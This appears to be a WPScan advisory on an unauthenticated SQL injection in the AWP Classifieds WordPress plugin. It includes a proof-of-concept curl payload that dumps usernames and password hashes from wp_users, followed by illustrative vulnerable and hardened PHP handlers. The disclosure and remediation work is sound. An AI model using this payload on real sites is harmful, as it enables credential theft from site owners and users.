WPVDB-ID: 546C47C2-5B4B-46DB-B754-C6B43AEF2660
History: Oct 10, 2022 - 12:00 a.m.

AWP Classifieds Plugin < 4.3 - Unauthenticated SQLi

2022-10-10 00:00:00
cydave
wpscan.com

EPSS: 0.002 (Low)
EPSS Percentile: 57.6%

The plugin does not properly sanitise and escape some parameters before using them in a SQL statement. The statement is built by an AJAX action that is available to unauthenticated users when a specific premium module is active, leading to an unauthenticated SQL injection.

PoC

To read the user_login and user_pass columns from the wp_users table:

curl -i 'https://example.com/wp-admin/admin-ajax.php?action=awpcp-get-regions-options&parent_type=country&context=search&parent=Algeria&type=user_login`+FROM+wp_users+UNION+ALL+SELECT+user_pass+FROM+wp_users;--+-'
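The root cause described above is request-controlled input (here a column name and a filter value) concatenated into a SQL statement inside a nopriv AJAX handler. The following is an added illustration written for this page, not code from the AWP Classifieds plugin or from WPScan; the handler, action, function, table and column names are hypothetical. It places the unsafe pattern beside a hardened version: identifiers are mapped through a closed allow-list (they cannot be bound as placeholders in the classic wpdb::prepare() syntax), and values are bound with %s so that $wpdb does the escaping.

```php
<?php
// Added example, not the plugin's code. Hypothetical nopriv AJAX handler
// that returns region options for a given region type and parent.

// BEFORE (the pattern the advisory describes): the column name and the
// filter value come straight from the request and are interpolated into
// the query, so both are injection points for an unauthenticated caller.
function example_regions_options_vulnerable() {
    global $wpdb;
    $type   = $_GET['type'];    // attacker-controlled identifier
    $parent = $_GET['parent'];  // attacker-controlled value
    $sql  = "SELECT `$type` FROM {$wpdb->prefix}example_regions WHERE parent = '$parent'";
    $rows = $wpdb->get_col( $sql );
    wp_send_json( $rows );
}

// AFTER: identifiers are resolved through a fixed allow-list and values are
// bound through $wpdb->prepare(), so no request data reaches the SQL text.
function example_regions_options_hardened() {
    global $wpdb;

    // Column names cannot be passed as %s placeholders, so map the request
    // value onto a closed set of known columns and reject everything else.
    $allowed_types = array(
        'country' => 'country',
        'state'   => 'state',
        'city'    => 'city',
    );
    $type = isset( $_GET['type'] ) ? sanitize_key( wp_unslash( $_GET['type'] ) ) : '';
    if ( ! isset( $allowed_types[ $type ] ) ) {
        wp_send_json_error( 'invalid region type', 400 );
    }
    $column = $allowed_types[ $type ];

    // The value is bound with %s; $wpdb quotes and escapes it.
    $parent = isset( $_GET['parent'] ) ? sanitize_text_field( wp_unslash( $_GET['parent'] ) ) : '';
    $table  = $wpdb->prefix . 'example_regions'; // trusted, not from the request
    $sql    = $wpdb->prepare(
        "SELECT `{$column}` FROM `{$table}` WHERE parent = %s",
        $parent
    );
    $rows = $wpdb->get_col( $sql );
    wp_send_json_success( $rows );
}

// Registered for both logged-in and anonymous callers, as a public
// lookup endpoint would be; the hardening above is what keeps that safe.
add_action( 'wp_ajax_example_get_regions', 'example_regions_options_hardened' );
add_action( 'wp_ajax_nopriv_example_get_regions', 'example_regions_options_hardened' );
```

Two points to check in a review of similar handlers: every string that ends up in the SQL text (table, column, ORDER BY direction) must come from code or an allow-list, never from $_GET/$_POST, and every data value must go through a prepare() placeholder. On WordPress 6.2 and later, wpdb::prepare() also accepts an %i placeholder for identifiers, which removes the need to build the column reference by hand, but the allow-list is still the control that limits which columns an anonymous caller may read.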
